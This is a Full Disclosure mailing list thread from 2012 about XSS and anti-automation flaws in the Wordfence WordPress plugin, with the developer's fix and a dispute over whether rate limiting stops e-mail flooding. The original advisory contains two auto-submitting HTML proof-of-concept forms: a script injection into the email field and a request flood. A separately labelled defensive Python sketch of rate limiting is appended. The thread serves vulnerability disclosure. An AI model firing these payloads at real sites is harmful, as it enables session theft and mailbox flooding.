Full Disclosure mailing list archives
Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 27 Oct 2012 01:57:48 +0300
Hi Mark!

You are welcome. As I see, you've reacted to the post on Full-disclosure even faster than to my letter to you (which I sent you before disclosing to security mailing lists). It is an example of the power of Full-disclosure ;-).

It's good that you've quickly fixed these holes. But I don't agree with the way you've fixed the IAA vulnerability (the XSS, though, is fixed correctly, as I've checked).

You wrote in the changelog that you added rate limiting to a max of 10 requests per second to the unlock form. But it doesn't protect from spamming. As I wrote in the comment on the IAA vulnerability in the advisory at my site: "There is no protection (captcha) against automated picking up of admin's e-mail. And if to know admin's e-mail, then by this way it'll be possible to spam him by letters from the site".

From this you can see that your fix can't protect from this attack (as captcha could). By sending 10 requests per second with the correct e-mail, it'll be possible to overspam the admin's e-mail account (so the plugin is still vulnerable to IAA and you need to fix it better). Also there are other vulnerabilities in Wordfence, and all of these vulnerabilities concern your web site too.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From: Mark Maunder
To: MustLive
Cc: submissions () packetstormsecurity org ; full-disclosure () lists grok org uk
Sent: Friday, October 19, 2012 9:09 PM
Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress

This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded.

http://wordpress.org/extend/plugins/wordfence/changelog/

Thanks for your report.

Regards,

Mark Maunder.

On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive () websecurity com ua> wrote:

Hello list!

I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress.

Wordfence is a security plugin for WordPress.

-------------------------
Affected products:
-------------------------

Vulnerable are Wordfence Security 3.3.5 and previous versions.

----------
Details:
----------

XSS (WASC-08):

Wordfence Security XSS.html

<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email" value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

Insufficient Anti-automation (WASC-21):

Wordfence Security IAA.html

<html>
<head>
<title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email" value="admin () e-mail com">
</form>
</body>
</html>

I've informed the plugin developer about the vulnerabilities. And I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6106/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

--
Mark Maunder <mmaunder () gmail com>
France: (+33) 068-700-8029

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
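The disagreement in this thread, per-client request rate limiting versus bounding what reaches the admin's mailbox, can be shown with a small model. This is an added example, not code from the thread or from Wordfence, and it is sketched in Python rather than the plugin's PHP. The class name, the cap of 3 mails per hour per recipient, and the addresses are assumptions constructed for illustration.

```python
import time
from collections import defaultdict, deque

# Same text for every outcome, so the form cannot be used to confirm an address.
GENERIC_REPLY = "If that address belongs to an administrator, an unlock e-mail was sent."

class UnlockMailGate:
    """Hypothetical gate in front of an unlock-e-mail form (not Wordfence code)."""

    def __init__(self, admin_emails, per_ip_per_sec=10, per_rcpt=3,
                 rcpt_window=3600, clock=time.monotonic):
        self.admins = {e.lower() for e in admin_emails}
        self.per_ip_per_sec, self.per_rcpt = per_ip_per_sec, per_rcpt
        self.rcpt_window, self.clock = rcpt_window, clock
        self.ip_hits = defaultdict(deque)    # client IP -> request times
        self.rcpt_hits = defaultdict(deque)  # recipient -> times a mail was sent

    @staticmethod
    def _allow(hits, now, limit, window):
        """Sliding-window counter: drop expired entries, then admit or refuse."""
        while hits and now - hits[0] >= window:
            hits.popleft()
        if len(hits) >= limit:
            return False
        hits.append(now)
        return True

    def handle(self, ip, email, cap_recipient=True):
        """Return (reply_text, mail_sent); reply_text is identical in all cases."""
        now, email = self.clock(), email.strip().lower()
        if not self._allow(self.ip_hits[ip], now, self.per_ip_per_sec, 1):
            return GENERIC_REPLY, False
        if email not in self.admins:
            return GENERIC_REPLY, False
        if cap_recipient and not self._allow(self.rcpt_hits[email], now,
                                             self.per_rcpt, self.rcpt_window):
            return GENERIC_REPLY, False
        return GENERIC_REPLY, True  # the caller would queue the e-mail here

def mails_in_one_minute(cap_recipient):
    """Constructed load: one client, 10 requests per second for 60 seconds."""
    now = [0]
    gate = UnlockMailGate(["admin@example.test"], clock=lambda: now[0])
    sent = 0
    for second in range(60):
        now[0] = second
        for _ in range(10):
            sent += gate.handle("203.0.113.5", "admin@example.test", cap_recipient)[1]
    return sent
```

With only the 10-requests-per-second limit, a client that stays at the limit gets 600 mails delivered in a minute; with the per-recipient cap the mailbox receives 3.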
Current thread:
- XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)